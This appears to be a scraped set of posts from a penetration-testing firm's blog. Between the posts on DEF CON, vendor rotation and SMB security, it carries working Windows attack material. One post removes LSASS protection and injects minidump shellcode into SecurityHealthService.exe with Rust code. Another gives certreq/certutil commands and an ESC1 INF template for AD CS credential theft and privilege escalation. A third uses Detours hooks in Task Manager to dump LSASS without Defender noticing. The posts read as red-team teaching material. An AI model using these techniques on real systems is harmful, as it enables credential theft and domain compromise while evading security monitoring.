Now we see our lvlchg_client.exe process running as PsProtectedWinTcb and the protections on LSASS are now gone.

Now that we have adjusted the process protections accordingly, we could just call MiniDumpWriteDump from our process and be a-okay. But wouldn’t it be cooler if we could inject into another protected process and have that do the minidump for us?

A while back I created pic_minidump which executes a minidump and was written to be position independent. This means it can easily be transformed into shellcode to increase its versatility. By default, it creates the dump file in C:\Windows\test.dmp.

In the client code, since we are accepting the PID we want to inject into on the command line, I embedded the minidump shellcode into the client and am converting the PID into bytes and interpolating it into the shellcode at the necessary locations. This is so the shellcode does not need to be compiled and added to the project each time you want to inject into a different PID.

Now you may be apprehensive about running code off GitHub with mysterious shellcode in it. But it’s fine. Source: Trust me bro.

If you want to add the shellcode yourself, you can compile the pic_minidump project and convert it to shellcode per the instructions in the repo. You will just need to change the process ID to the one you want to inject into.

When choosing a process to inject into, I had the most success with SecurityHealthService.exe. It runs at a lower protection level than our client process, and injecting into it had no adverse effect on the system.

Continuing in the client code, we can open a handle to the process and inject the minidump shellcode into it.
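A generic sketch of that injection (CreateRemoteThread style; the actual client may do this differently, and the windows crate signatures vary a little between versions):

use std::ffi::c_void;
use windows::Win32::Foundation::CloseHandle;
use windows::Win32::System::Diagnostics::Debug::WriteProcessMemory;
use windows::Win32::System::Memory::{VirtualAllocEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE};
use windows::Win32::System::Threading::{
    CreateRemoteThread, OpenProcess, WaitForSingleObject, INFINITE, PROCESS_ALL_ACCESS,
};

// shellcode holds the PID-patched pic_minidump bytes; target_pid is SecurityHealthService.exe
let h_process = OpenProcess(PROCESS_ALL_ACCESS, false, target_pid).unwrap();

let remote = VirtualAllocEx(
    h_process,
    None,
    shellcode.len(),
    MEM_COMMIT | MEM_RESERVE,
    PAGE_EXECUTE_READWRITE,
);

WriteProcessMemory(
    h_process,
    remote,
    shellcode.as_ptr() as *const c_void,
    shellcode.len(),
    None,
).unwrap();

let h_thread = CreateRemoteThread(
    h_process,
    None,
    0,
    Some(std::mem::transmute(remote)),   // shellcode entry point
    None,
    0,
    None,
).unwrap();

WaitForSingleObject(h_thread, INFINITE);
let _ = CloseHandle(h_thread);
let _ = CloseHandle(h_process);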

With all that done, all we have to do is compile both projects, load our driver, and execute our client with the process ID of SecurityHealthService.exe.

After all that, we can see the dump file created at C:\Windows\Tasks\test.dmp.

Full code for the driver and client are available below:

Driver: https://github.com/djackreuter/lvlchg

Client: https://github.com/djackreuter/lvlchg_client

References

https://memn0ps.github.io/rusty-windows-kernel-rootkit/

https://itm4n.github.io/lsass-runasppl/

https://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-hash-mitigations-windows-81/

Going to DEF CON was a dream I never thought would come to fruition. I remember being in 8th grade in 2009, reading a physical copy of Wired magazine in the back of my parents' minivan on the way to visit family in Milwaukee, WI, and seeing pictures and reading about the largest hacking conference in the world. There were hackers getting arrested, voting machine hacking, lock picking, and hacker jeopardy. That dream came true in 2016 at DEF CON 24.

At DEF CON 31 I returned to speak at the Hardware Hacking Village. My first time speaking at DEF CON was full of anxiety, as the Sunday before flying out I was testing the hardware and I found out I ordered the ESP-01 and not the ESP-01S. I was up until 1 AM trying to get it to work anyway, but ended up putting in a last minute Amazon order (at twice the price of AliExpress) to get the ESP-01S's I needed. Thankfully the Amazon delivery arrived that Tuesday and we flew out Wednesday evening.

My talk (Introduction To Esp8266/Esp32 Microcontrollers And Building A Wi-Fi Deauthentication Detector):

TL;DR of my talk:

Slides are available here: https://twitter.com/TheL0singEdge/status/1690142545605791752

Lessons Learned:

DEF CON 31 Tool Highlights:

References:
https://media.defcon.org
https://www.flickr.com/photos/r6_cannibal/albums/72177720310525638/
https://twitter.com/search?q=%23defcon

Having sold and performed assessments and pentests for nearly 20 years, I’ve had plenty of opportunities to hone my strategy and messaging. One common challenge I hear is, “our Board of Directors requires us to rotate vendors” or “our examiner wants us to get a new set of eyes”. This article will explain why I think that could be a big mistake.

Let’s first assume that you’ve done your due diligence and selected a qualified pentest firm with experienced consultants and actionable advice. It’s likely that you’ve tried multiple firms before finding the one that best fits your company’s needs. So why change pentest providers once you’ve found the one that’s right for you? Below are my practical responses to these well-intentioned practices.

We Need to Rotate Pentest Firms

While there could be worthy arguments for rotating pentesters, rotating pentest firms is risky. If you’ve found a great provider, continue to build that partnership rather than taking risks by starting over with a new firm each year. A good pentest firm can ensure depth and consistency, and they may even help get you out of a jam. By depth, I mean that pentesters thrive and do their best when they collaborate with a team. There’s too much to research, too many blogs, and too many tweets to keep up with everything. When you have a pentester who’s part of a team, you get the combined value of that team. A good pentest firm will also hire and retain sufficient experienced pentesters so you don’t need to worry about the individual pentester on your next engagement.

Consistency is important because a good firm can offer you new pentesters over time while using the same metrics for assessing and reporting risks. The pentesting firm owns the reporting and finding templates, and ensures that all members of the pentest team meet a standard of excellence. Using the same firm for multiple engagements also allows prior notes and findings to be handed off to the next consultant, making subsequent tests more efficient. At SynerComm, we’ve also come to the rescue and helped numerous clients get out of a jam or fill a last second request because of the partnerships we’ve built. It helps to know who you’re going to call when you need help.

We Need a New Set of Eyes

This (perhaps poor) advice hinges on the assumption that your current pentester is missing something or will fail to report a vulnerability in the future. If you think that’s the case, then it’s probably time to find a better pentesting partner. The reality is that good pentesters are always researching the latest vulnerabilities and integrating them into their testing methodologies. When a pentester is part of a team that collaborates and shares with each other, the thoroughness and capability of the team grows much faster. If you need a new set of eyes, you really only need a pentest firm with enough qualified and experienced pentesters to offer new resources over time.

That said, I can make strong arguments for using the same pentester several years in a row. Much like an attorney, doctor, or accountant, your pentester should quickly earn a position of high trust. It’s their job to become intimately familiar with your information security strengths and weaknesses. Having the same consultant on a series of engagements is more efficient because they can build on their prior understanding and pick up where they left off. This can provide more depth and more breadth in subsequent projects. It’s common for SynerComm’s clients to request that the same pentester be assigned to multiple engagements, especially with our adversary simulation services (see note at bottom).

Our Policy Requires Us to Change Vendors

Standards and policies are important right up until they start providing bad guidance. For over 20 years, password aging (expiring passwords after a certain amount of time) was considered an important security control. Despite knowing better, even NIST continued to publish security standards stating that passwords should be set to expire after 90 days. For years companies and government agencies required users to frequently change their password and the result was weaker passwords that are easier to guess. My point is that if you’re only switching vendors because you have a policy that says to do so, then this is a good time to reassess that policy. For all the reasons I just described, most companies will make the greatest security improvements by partnering with a great firm staffed with great people.

Tldr;

The next time you find yourself in a position where your policy, board of directors, or examiner tells you to rotate vendors, start a conversation about effective risk management. Finding a great pentesting partner can be a challenge and there is much greater risk in changing firms than sticking with a partner you can trust. A good firm should have sufficient staff and work history to ensure that you can still get a new set of eyes without losing consistency or efficiency. Imagine how much more you can accomplish each year when you’re not interviewing several new vendors, negotiating new contracts, going through legal reviews, and onboarding new vendors. Just like your attorney or accountant, partner with a firm that you can trust to deliver consistent, high-quality engagements over time.

A Note on Adversary Simulations (AdSim): SynerComm uses the term adversary simulation to describe a unique pentesting service we provide to clients. Rather than only presenting and providing a written report, SynerComm’s pentesters offer live demonstrations of common attacks on our client’s networks. Our adsim sessions are 100% collaborative between our client’s defenders and our pentesters. Both sides get to share their screens and ask questions. Our pentesters show how attack tools work and our clients show evidence of their controls generating logs and alerts. When controls are not effective at detecting or preventing attacks, the adsim can be used to retest until they can be tuned or corrected. The adsim also provides invaluable training for defensive teams to see what their controls look like when detecting real attacks.

Our first adsim is always a “pentest replay”, meaning that its content is based on lessons learned from a recent external-to-internal penetration test. The focus is on methods of command and control, privilege escalation, and lateral movement, but always specific to the last pentest. The adsim highlights both attacks that were prevented as well as those that weren’t. Following an initial pentest replay adsim, many clients schedule several additional adsim sessions to further evaluate their controls against specific threats and APTs.

For more information, check out https://www.synercomm.com/cybersecurity/adversary-simulation/

I’m a fan of full-featured, weaponized C2s as much as anyone else if they save time and make my job easier. But sometimes they can make your job harder when you’re dealing with EDR, and a lot of opsec considerations come into play. Just because your C2 supports a particular feature doesn’t necessarily mean you should use it if the goal is to keep your shell or to remain stealthy. A simple command shell and a SOCKS proxy are under-rated if you ask me. A reliable, opsec-safe method to execute commands and the ability to proxy tools through an endpoint solves most of those EDR problems. In that sense I’m always interested in leveraging built-in Windows utilities whenever possible to do my “dirty work”. Prior to SpecterOps’ research, my primary use cases for certutil were launching payloads and base64 encoding/decoding from time to time. But as you might already suspect, these utilities can also come in handy for abusing default templates as a means of credential theft and even elevating privileges. 

This blog assumes that you only have access to a command shell. Right now you just want to go as far as you can with that command shell before you set up your proxy, detonate a C2 agent, etc. It is also assumed that you are already familiar with AD CS vulnerabilities and abuse cases such as those pointed out by SpecterOps (e.g., ESC1). If you’ve ever played with certutil then you know that it loves to pop up a GUI when you don’t supply the right argument so that you can select it. The example commands in this blog avoid those interactions since we are assumed to be working with just a command shell. 

Let’s jump in with some basic certutil 101 to get a list of templates: 

C:\> certutil -v -dstemplate 

This will get you a list of all templates with general permission and enrollment settings. You will not get highly detailed configurations such as those returned through LDAP searches. However, you may still be able to identify vulnerable templates (such as ESC4 shown below). 

We will not be exploiting ESC4 in this blog. I just wanted to show an example of a vulnerable template that you might encounter using certutil by itself. 

The first example we’ll demonstrate for abusing AD CS doesn’t have anything to do with escalation whatsoever. Instead, we will discuss how default templates can be abused the second you obtain your command shell. 

Default User Template 

Straight out of the gate, the default “User” template can be used to obtain a certificate for your user. The default validity period for the certificate is 1 year, which is useful if the user later changes their password, whether due to expiration or because IR steps in down the road and has them change it. As long as the certificate is still valid and hasn’t been revoked, we can use it to obtain the NTLM hash for the account. This allows a semi-persistent form of credential theft (true for all certificates in general). The “ClientAuth” template is another potential option here, but we’ll use the “User” template. OK, so first let’s go ahead and enroll our user: 

C:\> certreq -q -enroll User 

We’ll note the Serial Number so that we can export the certificate.

Next, we’ll export the certificate using whatever password you want (hang onto it of course) and supplying the serial number for the certificate: 

C:\> certutil -exportpfx -user -p "Password123" My <SerialNum> C:\Users\dwebb\dwebb.pfx 

You can think of “My” as a keyword for the user’s Personal Certificate Store (i.e., using cert manager from the desktop) 

That’s all there is to it. Just two commands. Exfiltrate the certificate however you want and hold onto it. 

certipy-ad cert -pfx dwebb.pfx -password Password123 -export -out dwebbfinal.pfx 

Sometime over the next few hours, weeks, or even months, once you have your SOCKS proxy, go ahead and proxychain it through per usual to obtain the user’s NTLM hash. 
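For example, something along these lines (the DC IP is a placeholder):

proxychains certipy-ad auth -pfx dwebbfinal.pfx -dc-ip <dc ip>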

The NTLM hash corresponds to My0ldpass!, in case you are curious.

What I love about certificates from an offsec perspective, (but should scare the crap out of defenders) is that this certificate is valid for a year. Defenders will need to hunt it down and revoke it, otherwise, we can still use it whenever we want. 

Password reset to Myn3wpass! but certificate is still valid / has not been revoked 

OK, so we were able to retrieve the user’s NTLM hash with just 2 commands (and eventually a SOCKS proxy at some point within the next year). That’s convenient. 

Certificate Manager can be used to export your certificate if you suspect an alert might be generated. 

While attacks on AD CS are great for escalation, they also have an advantage for credential theft. This should not be news to anyone already familiar with AD CS vulnerabilities and exploitation, but abusing default templates is pretty nifty. Speaking of escalation, how might we exploit something like ESC1 from the command line? It’s actually pretty easy… 

Exploiting ESC1 

To exploit ESC1 from the command line, first we need to create an INF file for the request. All you’ll need to do is set the UPN of the account you’re targeting in the SAN and the name of the vulnerable template. These two lines are called out in the comments below. 

; esc1.inf 
[Version] 
Signature="$Windows NT$" 

[NewRequest] 
Subject = "CN=ESC1" ; Rename to whatever you want 
Exportable = TRUE ; Need true for export to pfx later 
KeyLength = 2048 
KeySpec = 1 
KeyUsage = 0xA0 
MachineKeySet = FALSE  
ProviderName = "Microsoft RSA SChannel Cryptographic Provider" 
RequestType = PKCS10 

[Extensions] 
2.5.29.17 = "{text}" ; OID for SAN extension  
_continue_ = "upn=<DAUserName>@<domain.tld>" ; UPN of DA account to place in SAN

[RequestAttributes] 
CertificateTemplate = "<TEMPLATENAME>" ; Name of template you're exploiting

Grab this file with curl, powershell, etc. and create the request based on the INF above: 

C:\> certreq -new esc1.inf request.pem 

Next, submit the request to the appropriate CA for your template: 

C:\> certreq -config "ca.domain.tld\CA-NAME" -submit request.pem cert.pem 

If you don’t know the name of the CA, run "certutil -dump" to avoid the GUI prompt. 

Accept the certificate for adding to the user’s personal certificate store and note the Serial Number: 

C:\> certreq -accept cert.pem 

Finally, export the certificate using the Serial Number from previous command output: 

C:\> certutil -exportpfx -user -p "Password123" My <SerialNum> C:\path\to\save\esc1.pfx 

See OpSec considerations if stealth is of utmost importance. 

This entire process is also shown below: 

Now all you need to do is retrieve the certificate and elevate at a later date when you’re ready. 

Conclusion 

The default User template can be useful the second we obtain a shell as a means of semi-persistent credential theft. We can use native Windows utilities to obtain these certificates for import into tools at a later date. We can also use them to exploit some of the most common security misconfigurations pointed out by the SpecterOps team. It’s always worth knowing how to leverage native Windows commands and utilities at your disposal to aid in exploitation. You never know when you might find yourself in a situation where it’s the best approach for the time being. 

References 

SpecterOps - Certified Pre-Owned: 

https://posts.specterops.io/certified-pre-owned-d95910965cd2

Microsoft Command Reference (certreq): 

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certreq_1

RiskInsight - Abusing PKI in Active Directory Environment:

https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/ 

In today’s business world, most companies are fully reliant on technology to maintain their daily operations. Data has become valuable currency and as much as technology creates convenience and efficiency, the sheer volume of connected devices and systems has increased risk and vulnerability. Attacks on systems are becoming more prolific and companies need to constantly evaluate if they have done enough to protect themselves or their customers.  

In a recent IT Trendsetters webinar with Rapid7, an MDR service provider, we discussed how cybersecurity is evolving and what the trends are for 2023. Specifically, common mistakes that make companies an easy target. You’ll want to avoid these pitfalls: 

Thinking that nobody cares about our company or data 

There is a perception that cybercriminals only target major multinational companies that have large customer databases of sensitive information worth exploiting. This may have been the case several years back, but no longer. These companies have invested heavily in security, making it harder for criminals to break into their systems, and so the attackers are turning to easier targets – small and medium-sized businesses.  

Typically smaller companies don’t invest as heavily in security or monitor their systems as diligently, yet most are connected to the internet in some way. This makes them relatively easy targets. Even smaller businesses have to protect their reputation and their customer data and criminals know and exploit this. Unfortunately, without adequate protections in place, most small to medium-sized businesses don’t survive a targeted cyberattack. When considering security, it should be viewed as a necessity for business continuity rather than an additional expense. If company systems are exposed to the internet, they’re vulnerable and it takes a strategic effort and investment to make them more secure.  

Not utilizing Multi-Factor Authentication (MFA) 

A major trend emerging from 2022 was that almost 40% of high-severity breaches were a result of not implementing MFA on public-facing surfaces. Attackers got into systems with relative ease and were able to do a fair amount of damage in a short period of time. While many employees may feel that MFA is an annoyance, in terms of business, it has become essential. It’s a really simple, no-cost way of making it harder for attackers to access and navigate through systems. The value cannot be overstated. In fact, most insurance companies include MFA as a requirement for obtaining insurance coverage.  

Not securing connected devices 

Exchange servers, gateways, firewalls, and any endpoint that touches the internet could become an access point for an attacker if it is not properly secured. These are some of the areas that threat actors commonly go after to get into company systems and account for approximately 25% of attacks. Companies need to be diligent in keeping these access points patched and monitoring them for any unusual activity.  

Compromised identities 

Another major trend is attackers using stolen credentials to gain access to a company system. These are often obtained through phishing emails or by compromising an employee’s social media account. In addition, there are many brokers on the dark web making good business by selling compromised but authenticated identities. These are often identities of past employees, and without robust authentication and monitoring services in place, these compromised identities can go undetected. The risk of compromised identities is another reason to implement MFA. If an identity is compromised but MFA is in place, it is harder for attackers to use the identity to progress within company systems.  

Inadequate defense mechanisms 

As much as companies are proactive about security, the reality is that attack methods are constantly evolving and it’s not always possible to keep ahead of and block every vulnerability. This is why it’s critical when a threat is identified, to have partners, systems, and policies in place to be able to isolate and quickly shut down the attack to minimize the damage.  

The challenge is that this is a complex task requiring specific expertise and the capacity to work with great urgency. Where the attack originated, how attackers gained access, what they did, and how it impacted business all form part of how the threat is resolved. Most small to medium-sized businesses can’t afford to employ this level of expertise full-time, especially as the nature of threats is becoming increasingly complex. This is why it often makes sense to partner with Endpoint Detection and Response (EDR) and security specialists as part of a managed solution. Because they work with a number of clients, they have greater insight into how best to counter attacks and can often move more swiftly to mitigate the damage. 

But even in that, there is a challenge. There are so many different security services available and it can be difficult to identify which ones are applicable to a specific business. There is no one-size-fits-all solution. When investigating options, it’s important to understand where the services start and end. For example, a managed detection and response service likely won’t be running system and patch updates, but they would be able to identify and work to resolve threats.  

Because of these complexities, another emerging trend is that many insurance companies are recommending companies outsource their security to partners who are specialists. Their collective exposure to threats makes them better positioned to be able to identify possible threats and remediate them. They can also then use this information to identify what gaps exist in terms of threats and what steps need to be taken to put the right security in place to reduce the risks.  

Cybersecurity constantly evolves, as these trends indicate, and requires an agile approach. Companies should continue to be proactive about security, partnering with industry specialists and keeping abreast of threats and vulnerabilities.  


There are many ways to create an LSASS dump file. One of the easiest ways is with Windows Task Manager. Simply right click the LSASS process and click “Create dump file”. This is great, except for the fact that Windows Defender will immediately flag this as malicious. Far from stealthy. Not ideal. 

This raised some interesting questions. What is it about Task Manager that triggers detection so quickly? One of the main differences when dumping a process through Task Manager is that you cannot change the name of the output file. It will just be the name of the process, in our case “lsass.DMP”. So could it be that Defender sees that file getting created and that triggers the alert? What if we could hook the API call(s) responsible for creating the file and change the name to something more benign? Task Manager is a trusted Windows tool, after all, and does not allow users to change the name of the resulting dump file. Can we abuse this trust to create an LSASS dump file with a different name that will leave Defender none the wiser? Short answer, yes! This blog will serve as an introduction to Windows API hooking. First, we will monitor the API calls made while dumping LSASS from Task Manager. Then we will create a DLL that we can inject into the Task Manager process that will hook the API calls responsible for file creation and change the name of the LSASS dump file that gets created.  

Short Introduction to API Hooking: In order to change the name of the resulting dump file, we need to identify and “hook” the API calls responsible for creating the file so that we can modify the filename to our liking. To do this, we will use the Detours library. Installation and setup of this library are outside the scope of this blog and are left as an exercise for the reader.

According to the Detours Wiki: “Detours replaces the first few instructions of the target function with an unconditional jump to the user-provided detour function. Instructions from the target function are placed in a trampoline. The address of the trampoline is placed in a target pointer.”

Essentially, once the target function is called, we will “jump” to our detour function. This is the function that we control. We can read the parameters to the function, modify them, or perform other actions before passing execution back to the original function. In our case, our detour function will modify the file path from the default: C:\Users\<username>\AppData\Local\Temp\lsass.DMP to something else. 

https://www.cs.columbia.edu/~junfeng/10fa-e6998/papers/detours.pdf

To identify the API calls we need to hook, we will use the tool API Monitor to, as the name suggests, monitor the API calls that are made when the dump file is created. We can then search through the output for a portion of our string “AppData\Local\Temp\lsass.DMP” and find the functions where it is being used. 

Because dumping LSASS requires administrative privileges, we will start Task Manager and API Monitor as Administrator. 

Before monitoring the process, we will select some API filters to tell API Monitor what to log. Since an exorbitant number of API calls are made, selecting everything is not ideal. We will select a few choices that seem reasonable for what we are trying to find. I have selected “Data Access and Storage, Diagnostics, NT Native, and System Services”. 

We select taskmgr.exe and begin monitoring. We create the LSASS dump file which unsurprisingly triggers Defender and kills the taskmgr process. In this short span of activity, we logged 193,416 API calls. Hopefully a few of them have what we need. 

Now we need to figure out where this file is getting created. Starting on the first thread, we search for our target string and see that the first call is to RtlInitUnicodeString.

Looking at the function signature on MSDN, we can see that the second parameter is the source string, which is the path to the lsass.DMP file, and the first parameter is a pointer to a UNICODE_STRING type that will be filled by this function call. 
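For reference, the prototype as documented on MSDN looks like this:

VOID RtlInitUnicodeString(
    PUNICODE_STRING DestinationString,  // out: receives the counted Unicode string
    PCWSTR          SourceString        // in, optional: in our case the path to lsass.DMP
);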

Now, looking ahead a little, we are trying to see where the file is getting created. Beyond the call to RtlInitUnicodeString, we see a call to NtCreateFile. We can inspect the parameters in API Monitor, and we do see our target string deep in the fields of the OBJECT_ATTRIBUTES struct.

Looking up NtCreateFile on MSDN shows that the OBJECT_ATTRIBUTES struct contains a field, ObjectName, of type PUNICODE_STRING, which according to the documentation “Points to a buffered Unicode string that names the file to be created or opened.”
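For context, OBJECT_ATTRIBUTES (as defined in the Windows headers) looks like this, with ObjectName being the field we care about:

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;               // the NT path of the file being created
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES;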

Now, we don’t necessarily need to hook the call to NtCreateFile; we just need to find where this string is getting created and change it upstream of the call to this function.

We already know about RtlInitUnicodeString, and just below that call there is a call to RtlDosPathNameToRelativeNtPathName_U, which also contains the lsass.DMP path string we are looking for. This is an undocumented function in ntdll.dll, but we can still find its function signature on a site such as ReactOS, and I also found that ChatGPT is quite handy for this as well.
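The signature, as reconstructed from ReactOS-style references (so treat it as approximate rather than official), looks roughly like this:

BOOLEAN NTAPI RtlDosPathNameToRelativeNtPathName_U(
    PCWSTR          DosName,      // in:  the DOS-style path, ending in lsass.DMP in our case
    PUNICODE_STRING NtName,       // out: receives the translated NT path
    PCWSTR          *PartName,    // out: the final component of the path
    PVOID           RelativeName  // out: RTL_RELATIVE_NAME_U*, simplified to PVOID here
);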

It mentions that NtName is a pointer to a UNICODE_STRING struct that will receive the translated NT path. This is evident in API Monitor as well, where we can see this parameter has the same memory address as the PUNICODE_STRING passed to RtlInitUnicodeString.

Repeating this process, we identify two other API calls that are like the previous two. 

RtlInitUnicodeStringEx 

RtlDosPathNameToRelativeNtPathName_U_WithStatus 

Finally, the last call is to SetDlgItemTextW, which sets the text in the dialog box when the dump is complete. So, to recap, we will need to hook the following API calls:

RtlInitUnicodeString 

RtlDosPathNameToRelativeNtPathName_U 

RtlInitUnicodeStringEx 

RtlDosPathNameToRelativeNtPathName_U_WithStatus 

SetDlgItemTextW 

Creating our functions: 

We will open Visual Studio, create a new project, and select Dynamic-Link Library (DLL). Now, for each of the functions we need to hook, we have to do two things. The first is to create a pointer to the function we want to hook. The second is to create the detour function itself that will be invoked when our target function is called.

We define the function pointers like so: 
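A minimal sketch of what these declarations might look like (assuming <windows.h> and <winternl.h> for the NT types; the exact code in the repo may differ slightly):

// Pointers to the real functions; the ntdll ones are resolved at runtime
static VOID     (NTAPI *pRtlInitUnicodeString)(PUNICODE_STRING Dest, PCWSTR Src) = NULL;
static BOOLEAN  (NTAPI *pRtlDosPathNameToRelativeNtPathName_U)(PCWSTR DosName, PUNICODE_STRING NtName, PCWSTR *PartName, PVOID RelativeName) = NULL;
static NTSTATUS (NTAPI *pRtlInitUnicodeStringEx)(PUNICODE_STRING Dest, PCWSTR Src) = NULL;
static NTSTATUS (NTAPI *pRtlDosPathNameToRelativeNtPathName_U_WithStatus)(PCWSTR DosName, PUNICODE_STRING NtName, PCWSTR *PartName, PVOID RelativeName) = NULL;
static BOOL     (WINAPI *pSetDlgItemTextW)(HWND hDlg, int nIDDlgItem, LPCWSTR lpString) = SetDlgItemTextW;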

Notice that we initialize the first four function pointers to NULL, as opposed to the last one, which we set to the address of the real function we will be calling. This is because the first four functions are in NTDLL.dll and, even though they are exported by the library, they cannot be called directly. So, we will have to dynamically look up these functions to get their addresses. We can do this quite easily with Detours and the DetourFindFunction method.

We will also define two global variables: the path we are searching for, and what we want to replace it with.
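Something along these lines, where both values are placeholders of my choosing rather than the exact strings from the repo:

// Placeholder values: the real code matches the full Temp-directory path to lsass.DMP
static const wchar_t* g_lsassDumpName = L"lsass.DMP";                          // substring we look for
static const wchar_t* g_benignPath    = L"C:\\Users\\Public\\normalfile.txt";  // what we swap in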

Now we need to create the functions we want called when our target functions are hooked. These methods MUST have the exact same signature and calling convention as the real function. Using the same calling convention ensures that registers are properly preserved and that the stack stays properly aligned between our detour and target functions.

Since these APIs get called many times, we need to check the parameter containing the file path and see whether it is the path to our lsass.DMP file. If it is, we will replace it with our new path to “normalfile.txt” and call the real target function pointer with the new value. If it’s not, we will just call the real target function pointer with the parameters unchanged.
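As an illustration, a detour for RtlInitUnicodeString might look roughly like this, building on the placeholder globals and pointer names above (a sketch, not necessarily the exact code from the repo):

// Detour with the same signature and calling convention as the real RtlInitUnicodeString
VOID NTAPI HookedRtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString)
{
    // Only rewrite the path when it refers to the default lsass.DMP dump file
    if (SourceString != NULL && wcsstr(SourceString, g_lsassDumpName) != NULL)
    {
        pRtlInitUnicodeString(DestinationString, g_benignPath);
        return;
    }
    // Every other call passes straight through to the real function
    pRtlInitUnicodeString(DestinationString, SourceString);
}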

Now, on DLL_PROCESS_ATTACH, we will create a method, setHooks, which will contain our Detours code.

We are dynamically resolving the addresses to the functions located in NTDLL as mentioned earlier, and calling DetourAttach with a pointer to the address of our target function, and our detour function. 
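A condensed sketch of what setHooks might look like, showing only the RtlInitUnicodeString hook (the other four follow the same pattern):

void setHooks()
{
    // Resolve the ntdll export at runtime with Detours
    pRtlInitUnicodeString = (VOID (NTAPI*)(PUNICODE_STRING, PCWSTR))
        DetourFindFunction("ntdll.dll", "RtlInitUnicodeString");
    // ... resolve the other three ntdll functions the same way ...

    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourAttach(&(PVOID&)pRtlInitUnicodeString, HookedRtlInitUnicodeString);
    // ... attach the remaining detours ...
    DetourTransactionCommit();
}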

Similarly, on DLL_PROCESS_DETACH we are calling a removeHooks method that restores all the original code. 
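And a matching removeHooks sketch, again with only one of the five detours shown:

void removeHooks()
{
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    DetourDetach(&(PVOID&)pRtlInitUnicodeString, HookedRtlInitUnicodeString);
    // ... detach the remaining detours ...
    DetourTransactionCommit();
}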

Now we can compile our project and inject the DLL!  

For testing simplicity, I am using Process Hacker to inject our DLL into Task Manager. I also have a project, DLLInject, that would be more suitable in a real-world engagement. After injecting the DLL, we can see that it has been loaded into the process.

Now, dumping the LSASS process, we can see that our file has been created without a peep from Defender! 

The full source code can be found at: 

https://github.com/djackreuter/taskmgr_hooking

Are you concerned about keeping your online accounts, personal information, and business accounts secure? Check out this infographic on password security. Our team of experts has shared a visual guide that provides valuable tips and tricks on how to create strong and unique passwords, and how to store and manage them securely. With cyber attacks becoming more sophisticated each day, it's crucial to take proactive measures to protect yourself and your sensitive information. Let our team of experts help secure your business today with a password assessment!
